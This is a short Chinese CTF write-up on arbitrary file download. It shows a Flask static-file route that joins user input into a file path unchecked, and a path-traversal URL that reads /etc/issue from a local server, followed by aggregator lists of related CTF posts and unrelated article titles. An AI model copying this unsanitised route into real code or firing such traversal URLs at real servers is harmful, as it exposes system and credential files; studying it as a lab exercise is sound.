CTF web题总结--任意文件下载
代码:
@main.route('/static/<regex(".*"):file>')
def handle_static_file(file):if file.split('.')[-1] in ['py','db']:#return self.root_pathreturn fileif os.path.isdir('static/{}'.format(file)):return abort(403)try:filename=os.path.join(app.instance_path,file)with open(filename) as f:data = f.read()return dataexcept Exception as e:logging.error(e)return abort(404)
任意文件下载:
http://127.0.0.1:8000/static/../../../../../../../../../../../etc/issue
CTF web题总结--任意文件下载相关推荐
- CTF Web题 部分WP
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002 ...
- i春秋python_i春秋CTF web题(1)
之前边看writeup,边做实验吧的web题,多多少少有些收获.但是知识点都已记不清.所以这次借助i春秋这个平台边做题,就当记笔记一样写写writeup(其实都大部分还是借鉴其他人的writeup). ...
- hxp 36C3 CTF Web题 WriteupBin Writeup (Selenium模拟点击+Content Security Policy+Nonce+Parsley.js触发错误提示)
WriteupBin – A web challenge from hxp 36C3 CTF https://ctftime.org/event/825 题目部署 本地搭建: 解压WriteupBin ...
- mysql 南邮ctf_南邮ctf web题记录(上)
1.签到题 f12看源码就行了. md5 collision 题目贴出了源码,按照题意,a不等于QNKCDZO但是md5与QNKCDZO的md5相等时就可以获得flag. 如果两个字符经MD5加密后的 ...
- CTF web题总结--LFI
本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结 题目的url都是类似这种: http://127.0.0.1/ ...
- CTF web题 wp:
1.签到题 火狐F12查看源码,发现注释: 一次base64解码出flag 2.Encode 在这里插入图片描述 和第一题界面一样?? 轻车熟路f12: 发现编码: 格式看上去是base64,连续两次 ...
- 四个有关文件传输的CTF WEB题(深育杯FakeWget、极客大挑战where_is_my_FUMO、2021陇原战疫CheckIN、N1CTF-curl trick)
文章目录 深育杯FakeWget 极客大挑战where_is_my_FUMO 2021陇原战疫CheckIN N1CTF-curl trick wp来自官方发布和个人想法,觉得这四个题挺有意思的所以整 ...
- CTF Web题部分PHP魔术方法总结(Magic Methods)
几个常见的PHP魔术方法 简单介绍 详细介绍 __sleep() __wakeup() __get() __set() __isset() __unset() __construct() __dest ...
- CTF web题总结--爆破用户名密码
1.burp爆破用户名密码 2.id,userid,useId多试几次 3.爆破后台目录,index.php,users.php,login.php,flag.php 4.脚本: # -*- codi ...
最新文章
- 超过C++、压制Java与C,Python拔得TIOBE年度编程语言!
- PHP知识点 自己做个记录
- 逻辑回归的向量化实现样例
- StrutsPreparedAndExcuteFilter与Interceptor
- linux python安装第三方库_Linux中安装python3.6和第三方库
- android广告页白屏_年度整理!2056页《大厂安卓岗面试真题解析合集》火爆全网...
- “strcpy” 模拟的实现
- vue 引用src中的文件_Vue中引用第三方JS文件
- 2020中国高校薪资排行出炉!好过双一流的高校原来这么多!| 留言送书
- 当前没有可用的服务器_调研Redis高可用两种方案
- AbstractQueuedSynchronizer AQS源码分析
- Fermi架构白皮书_中文详细版.pdf
- 微信小程序 禁止弹框下面的内容滑动
- rf扫描枪_RF枪操作的简要步骤
- java生成随机数的三种方法
- html5gps定位经纬度,html5 定位 获得当前位置的经纬度
- Python unpickle 命令执行漏洞复现总结
- H3C交换机POE固件版本升级流程
- 2021-2027全球与中国双联式过滤器外壳市场现状及未来发展趋势
- 【ERP知识】一个VMI(供应商管理库存)实现方案
热门文章
- python错误-第16天:Python 错误和异常
- python面试常见问题-Python面试常见的8个问题及答案总结
- python写web难受-pythonweb为什么不火-问答-阿里云开发者社区-阿里云
- python流程控制语句-Python中流程控制语句的详细介绍
- python3下载文件-在Python 3中从Web下载文件
- python语言入门n-python面试题基础
- python爬虫实例解析-Python(爬虫)- 动态加载案例分析
- java 环境变量 locale,修改locale把语言环境变量改为英文
- 3704对象关闭时_JVM 通过逃逸分析就能让对象在栈上分配?没那么简单!
- doctype的三种类型